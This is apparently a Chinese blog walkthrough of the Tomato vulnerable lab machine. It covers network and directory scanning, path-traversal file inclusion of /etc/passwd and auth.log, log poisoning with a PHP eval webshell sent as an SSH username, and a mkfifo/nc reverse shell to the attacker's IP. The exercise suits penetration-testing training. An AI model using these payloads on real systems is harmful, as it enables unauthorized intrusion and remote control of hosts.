Tomato靶机~文件包含日志

寻找网站上传点并把 php 恶意代码文件改成 jpg 上传到网站上在本地包含引入恶意代码,当文件被引入后代码就被执行;

0x01信息收集

markdown 复制代码
# 环境准备:
Target IP:192.168.66.143
Attack IP:192.168.66.84
靶机目标:Tomato
// 这里需要注意靶机本身环境是桥接模式,我们需要给它换成NAT模式
markdown 复制代码
# 扫描网段
arp-sacn -l
markdown 复制代码
# 对靶机192.168.66.143端口扫描
nmap 192.168.66.143
markdown 复制代码
# 目录扫描
dirsearch -u "http://192.168.66.143"
dirb "http://192.168.66.143"

0x02漏洞发现

发现有文件上传的漏洞

markdown 复制代码
# 由于是linux系统,我们尝试看一下passwd文件
http://192.168.66.143/antibot_image/antibots/info.php?image=../../../../../../../etc/passwd
markdown 复制代码
# 我们再看一下它的日志
http://192.168.66.143/antibot_image/antibots/info.php?image=../../../../../../var/log/auth.log

0x03反弹shell

markdown 复制代码
# 我们尝试写一句话木马 ,进行反弹
ssh '<?php phpinfo();eval($_POST['sss']);?>'@192.168.66.143
markdown 复制代码
# 使用中国蚁剑连接
markdown 复制代码
# 连接终端
markdown 复制代码
# 在kali上开个监听
nc -lvvp 9999 
markdown 复制代码
# 反弹shell
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.66.128 9999 >/tmp/f
// IP是攻击机的

好小子,离成功又近一步!!!

相关推荐
Whoami!25 分钟前
2-3〔O҉S҉C҉P҉ ◈ 研记〕❘ 漏洞扫描▸AppScan(WEB扫描)
网络安全·信息安全·appscan·oscp
Bruce_Liuxiaowei20 小时前
跨站脚本攻击(XSS)高级绕过技术与防御方案
前端·网络安全·xss
人衣aoa1 天前
PG靶机 - Pelican
web安全·网络安全·渗透测试·内网渗透
lingggggaaaa1 天前
小迪安全v2023学习笔记(六十一讲)—— 持续更新中
笔记·学习·安全·web安全·网络安全·反序列化
运维行者_1 天前
使用Applications Manager进行 Apache Solr 监控
运维·网络·数据库·网络安全·云计算·apache·solr
挨踢攻城2 天前
IT资讯 | VMware ESXi高危漏洞影响国内服务器
安全·web安全·网络安全·vmware·虚拟化技术·厦门微思网络·vmware esxi高危漏洞
菜根Sec2 天前
Sqli-labs靶场搭建及报错处理
web安全·网络安全·渗透测试·sql注入·网络安全靶场
浩浩测试一下3 天前
02高级语言逻辑结构到汇编语言之逻辑结构转换 if (...) {...} else {...} 结构
汇编·数据结构·数据库·redis·安全·网络安全·缓存
啥都想学点4 天前
Windows基础概略——第一阶段
网络安全
star010-4 天前
PeiQi网络安全知识文库PeiQi-WIKI-Book保姆式搭建部署教程
安全·web安全·网络安全